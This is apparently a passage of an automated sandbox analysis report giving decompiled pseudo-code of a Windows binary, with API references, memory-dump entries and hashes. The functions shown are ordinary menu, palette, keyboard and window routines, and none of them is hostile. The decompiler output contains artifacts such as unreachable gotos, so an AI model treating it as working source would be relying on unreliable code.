                                                                                0x00458911
                                                                                0x00458832

                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,004589A4), ref: 0045883F
                                                                                • SetKeyboardState.USER32(00000081), ref: 00458883
                                                                                • SendMessageA.USER32 ref: 004588C8
                                                                                • SendMessageA.USER32 ref: 004588F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: KeyboardMessageSendState
                                                                                • String ID:
                                                                                • API String ID: 1999190242-0
                                                                                • Opcode ID: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction ID: 23862da68592c1e24948ec3166a75afe102c93af0ee48796f61bef12c2e153a4
                                                                                • Opcode Fuzzy Hash: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction Fuzzy Hash: 87615DB49006089FCB10EBA9C885ADDB7F4EB58304F6041EAE844B7392DF385F84DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044FAC0, Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E0044FAC0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x44fc86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00448D84(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041B98C(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043C018(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043BD14(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043C018(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043BD14(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043C018(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043BD14(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043BD14(_t92), _t70);
								}
								E00448D84(_t113, E0043BD14(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00450B80(_t92, 1);
							}
							E0044F9F8(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x44fc8d);
							return E00404320( &_v20);
						}
					}
				}
				_t77 =  *0x487c00; // 0x22e0f1c
				_t79 = E00453244(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x487c00; // 0x22e0f1c
						if(_t113 ==  *((intOrPtr*)(E00453230(_t81, _t111) + 0x248))) {
							_t83 =  *0x487c00; // 0x22e0f1c
							if(_t92 != E00453230(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x486acc; // 0x41ce84
								E00406520(_t87,  &_v20);
								E0040A0EC(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403D80();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                                                0x0044fac0
                                                                                0x0044fac8
                                                                                0x0044facb
                                                                                0x0044face
                                                                                0x0044fad0
                                                                                0x0044fad4
                                                                                0x0044fad5
                                                                                0x0044fada
                                                                                0x0044fadd
                                                                                0x0044fae2
                                                                                0x0044fb54
                                                                                0x0044fb54
                                                                                0x0044fb5c
                                                                                0x0044fb60
                                                                                0x0044fb60
                                                                                0x0044fb69
                                                                                0x0044fb75
                                                                                0x0044fb75
                                                                                0x0044fb77
                                                                                0x0044fb7f
                                                                                0x0044fb85
                                                                                0x0044fb85
                                                                                0x0044fb8c
                                                                                0x0044fc3f
                                                                                0x0044fc44
                                                                                0x0044fc46
                                                                                0x0044fc52
                                                                                0x0044fc52
                                                                                0x00000000
                                                                                0x0044fba5
                                                                                0x0044fbaf
                                                                                0x0044fbbe
                                                                                0x0044fc18
                                                                                0x0044fc1f
                                                                                0x0044fc23
                                                                                0x0044fc28
                                                                                0x0044fc2a
                                                                                0x0044fc36
                                                                                0x0044fc36
                                                                                0x0044fc2a
                                                                                0x00000000
                                                                                0x0044fc1f
                                                                                0x00000000
                                                                                0x0044fbc0
                                                                                0x0044fbc0
                                                                                0x0044fbc9
                                                                                0x0044fbd7
                                                                                0x0044fbda
                                                                                0x0044fbe4
                                                                                0x0044fbe9
                                                                                0x0044fbeb
                                                                                0x0044fbf5
                                                                                0x0044fc01
                                                                                0x0044fc01
                                                                                0x0044fc11
                                                                                0x0044fc11
                                                                                0x0044fc57
                                                                                0x0044fc5e
                                                                                0x0044fc64
                                                                                0x0044fc64
                                                                                0x0044fc6b
                                                                                0x0044fc72
                                                                                0x0044fc75
                                                                                0x0044fc78
                                                                                0x0044fc85
                                                                                0x0044fc85
                                                                                0x0044fbaf
                                                                                0x0044fb8c
                                                                                0x0044fae4
                                                                                0x0044faee
                                                                                0x0044faf1
                                                                                0x0044faf4
                                                                                0x0044faf7
                                                                                0x0044faf9
                                                                                0x0044fafb
                                                                                0x0044fb0b
                                                                                0x0044fb0f
                                                                                0x0044fb1b
                                                                                0x0044fb20
                                                                                0x0044fb23
                                                                                0x0044fb30
                                                                                0x0044fb35
                                                                                0x0044fb44
                                                                                0x0044fb49
                                                                                0x0044fb49
                                                                                0x0044fb1b
                                                                                0x0044fb4e
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044faf9

                                                                                APIs
                                                                                • GetMenu.USER32(00000000), ref: 0044FBE4
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC01
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC36
                                                                                • SetMenu.USER32(00000000,00000000,00000000,0044FC86), ref: 0044FC52
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$LoadString
                                                                                • String ID:
                                                                                • API String ID: 3688185913-0
                                                                                • Opcode ID: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction ID: f26370d87fe6636909658d251d97ac89f97443a29d0f9f175af0801ea8a7ce81
                                                                                • Opcode Fuzzy Hash: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction Fuzzy Hash: 8751D330A002885AEB60AF7AC8D575A7694AF05308F18557FEC149B397CB3CEC4C8B9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AD70, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AD70() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x4877f0 = 0x409;
				 *0x4877f4 = 9;
				 *0x4877f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x4877f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x4877f4 = _t14 & 0x3ff;
					 *0x4877f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x46b0c0, 0x40aec4, 8 << 2);
				if( *0x46b0ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x4877fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x4877fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040ACF8(__eflags, _t49);
					}
				} else {
					_t20 = E0040AD58();
					if(_t20 != 0) {
						 *0x4877fd = 0;
						 *0x4877fc = 0;
						return _t20;
					}
					E0040ACF8(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E004030F8(0x46b0c0, 0x20, 0x40aec4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x4877fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x4877fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x4877f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x4877fd = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                                0x0040ad7c
                                                                                0x0040ad86
                                                                                0x0040ad90
                                                                                0x0040ad9a
                                                                                0x0040ada1
                                                                                0x0040ada3
                                                                                0x0040ada3
                                                                                0x0040adab
                                                                                0x0040adb7
                                                                                0x0040adc3
                                                                                0x0040adc3
                                                                                0x0040add7
                                                                                0x0040ade0
                                                                                0x0040ae8f
                                                                                0x0040ae94
                                                                                0x0040ae99
                                                                                0x0040aea0
                                                                                0x0040aea5
                                                                                0x0040aea7
                                                                                0x0040aeaa
                                                                                0x0040aeb0
                                                                                0x0040aeb2
                                                                                0x00000000
                                                                                0x0040aeba
                                                                                0x0040ade6
                                                                                0x0040ade6
                                                                                0x0040aded
                                                                                0x0040adef
                                                                                0x0040adf6
                                                                                0x00000000
                                                                                0x0040adf6
                                                                                0x0040ae03
                                                                                0x0040ae13
                                                                                0x0040ae15
                                                                                0x0040ae1a
                                                                                0x0040ae1d
                                                                                0x0040ae23
                                                                                0x0040ae25
                                                                                0x0040ae27
                                                                                0x00000000
                                                                                0x0040ae27
                                                                                0x0040ae33
                                                                                0x0040ae38
                                                                                0x0040ae3e
                                                                                0x0040ae3e
                                                                                0x0040ae40
                                                                                0x0040ae41
                                                                                0x0040ae42
                                                                                0x0040ae42
                                                                                0x0040ae5e
                                                                                0x0040ae64
                                                                                0x0040ae69
                                                                                0x0040ae6e
                                                                                0x0040ae74
                                                                                0x0040ae74
                                                                                0x0040ae78
                                                                                0x0040ae7b
                                                                                0x0040ae81
                                                                                0x0040ae83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ae85
                                                                                0x0040ae88
                                                                                0x0040ae88
                                                                                0x0040ae89
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ae89
                                                                                0x0040ae74
                                                                                0x0040aec1
                                                                                0x0040aec1
                                                                                0x00000000

                                                                                APIs
                                                                                • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AE64
                                                                                • GetThreadLocale.KERNEL32 ref: 0040AD9A
                                                                                  • Part of subcall function 0040ACF8: GetCPInfo.KERNEL32(00000000,?), ref: 0040AD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InfoLocaleStringThreadType
                                                                                • String ID:
                                                                                • API String ID: 1505017576-0
                                                                                • Opcode ID: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction ID: 7b20ac4ac1a8ba6006ade8caa557296e2a43b71a996097c4bdc0da4cb0750b93
                                                                                • Opcode Fuzzy Hash: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction Fuzzy Hash: 9D3154315883468AE7109725ED25B9B3794EB01300F6484BFEC54AB3C1DB3C9855C7AF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422DCC, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00422DCC(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0041FA80(_v8);
					_push(_t87);
					_push(0x422eab);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E004240E8( *((intOrPtr*)(_v8 + 0x58)));
					E00422C48( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E004242C8( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					E0041FE44(_v8, _t69);
					_t59 =  *0x46b788; // 0x22e0b74
					E0041428C(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x422eb2);
					return E0041FC98(_v8);
				}
			}

















                                                                                0x00422dcd
                                                                                0x00422dcf
                                                                                0x00422dd2
                                                                                0x00422dd5
                                                                                0x00422ddc
                                                                                0x00422eb6
                                                                                0x00422de2
                                                                                0x00422de5
                                                                                0x00422dec
                                                                                0x00422ded
                                                                                0x00422df2
                                                                                0x00422df5
                                                                                0x00422dfe
                                                                                0x00422e0f
                                                                                0x00422e1a
                                                                                0x00422e26
                                                                                0x00422e31
                                                                                0x00422e36
                                                                                0x00422e4c
                                                                                0x00422e38
                                                                                0x00422e42
                                                                                0x00422e42
                                                                                0x00422e58
                                                                                0x00422e5d
                                                                                0x00422e7b
                                                                                0x00422e5f
                                                                                0x00422e6b
                                                                                0x00422e6f
                                                                                0x00422e6f
                                                                                0x00422e83
                                                                                0x00422e8b
                                                                                0x00422e90
                                                                                0x00422e97
                                                                                0x00422e9a
                                                                                0x00422e9d
                                                                                0x00422eaa
                                                                                0x00422eaa

                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                  • Part of subcall function 004242C8: GetDC.USER32(00000000), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: ReleaseDC.USER32 ref: 0042436C
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00422E21
                                                                                • SelectObject.GDI32(00000000,?), ref: 00422E3A
                                                                                • SelectPalette.GDI32(00000000,?,000000FF), ref: 00422E63
                                                                                • RealizePalette.GDI32(00000000), ref: 00422E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                • String ID:
                                                                                • API String ID: 979337279-0
                                                                                • Opcode ID: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction ID: e9a11356e23c73f42dbca714b493990e2baf7ab793a4ed1f979a99725cee0618
                                                                                • Opcode Fuzzy Hash: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction Fuzzy Hash: 9331F874B00614EFC704EB59D981D4EB3F5EF48314B6241A6E404AB362D678AE80EB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00449170, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00449170(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044887C(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E004486F8(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E004486F8(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408BFC(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408B40(_a12, _t49);
				}
			}










                                                                                0x00449177
                                                                                0x00449179
                                                                                0x0044917b
                                                                                0x00449186
                                                                                0x00000000
                                                                                0x0044920a
                                                                                0x0044918a
                                                                                0x0044919a
                                                                                0x004491b7
                                                                                0x004491bc
                                                                                0x004491c1
                                                                                0x004491ce
                                                                                0x004491ce
                                                                                0x0044919c
                                                                                0x004491a3
                                                                                0x004491b0
                                                                                0x004491b0
                                                                                0x004491d5
                                                                                0x00000000
                                                                                0x004491d7
                                                                                0x004491da
                                                                                0x004491e9
                                                                                0x00000000
                                                                                0x004491f1

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$ItemStateString
                                                                                • String ID:
                                                                                • API String ID: 306270399-0
                                                                                • Opcode ID: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction ID: e1c24750740d557e1e8c84f7fe76103c4d55c31368cde85f8e0fd78e7a4e0c38
                                                                                • Opcode Fuzzy Hash: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction Fuzzy Hash: 7011B431301214AFE700EE6DCC85DAF77E8AF49354B10446EF919E7382CA38ED01A7A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045AF4C, Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045AF4C(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045AEE4(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043BD14(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045AE60(_t43);
				SetWindowPos(E0043BD14(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045AE60(_t43);
				}
				_t26 = E004037B0( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043BD14(_t43));
				}
				return _t26;
			}










                                                                                0x0045af50
                                                                                0x0045af52
                                                                                0x0045af54
                                                                                0x0045af57
                                                                                0x0045af5c
                                                                                0x0045af5e
                                                                                0x00000000
                                                                                0x0045af62
                                                                                0x0045af70
                                                                                0x0045af76
                                                                                0x0045af78
                                                                                0x0045af8f
                                                                                0x0045af8f
                                                                                0x0045af7a
                                                                                0x0045af82
                                                                                0x0045af87
                                                                                0x0045af89
                                                                                0x00000000
                                                                                0x0045af8b
                                                                                0x0045af8b
                                                                                0x0045af8b
                                                                                0x0045af89
                                                                                0x0045af95
                                                                                0x0045afba
                                                                                0x0045afc3
                                                                                0x0045afc9
                                                                                0x0045afcb
                                                                                0x0045afcf
                                                                                0x0045afcf
                                                                                0x0045afde
                                                                                0x0045afe3
                                                                                0x0045afe5
                                                                                0x00000000
                                                                                0x0045afef
                                                                                0x0045aff8

                                                                                APIs
                                                                                • IsRectEmpty.USER32 ref: 0045AF57
                                                                                • IsWindowVisible.USER32(00000000), ref: 0045AF82
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFBA
                                                                                • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFEF
                                                                                  • Part of subcall function 0045AEE4: IsWindowVisible.USER32(00000000), ref: 0045AEFB
                                                                                  • Part of subcall function 0045AEE4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF22
                                                                                  • Part of subcall function 0045AEE4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF42
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$FocusVisible$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 698668684-0
                                                                                • Opcode ID: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
                                                                                • Instruction ID: aa951be320cb66b1e7991dbc00dcf3a6d2376953a5889a30f220f311acb53e10
                                                                                • Opcode Fuzzy Hash: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
                                                                                • Instruction Fuzzy Hash: B711A7713001015BC611A67A8841B7BA38D9F4534AF08462AFA54DB343DB2DDC19976E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421FDC, Relevance: 6.1, APIs: 4, Instructions: 64windowfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00421FDC(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				int _t29;
				void* _t33;
				void* _t35;
				struct HPALETTE__* _t36;
				void* _t38;
				struct HPALETTE__* _t39;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t33 = __edx;
				_t29 = __eax;
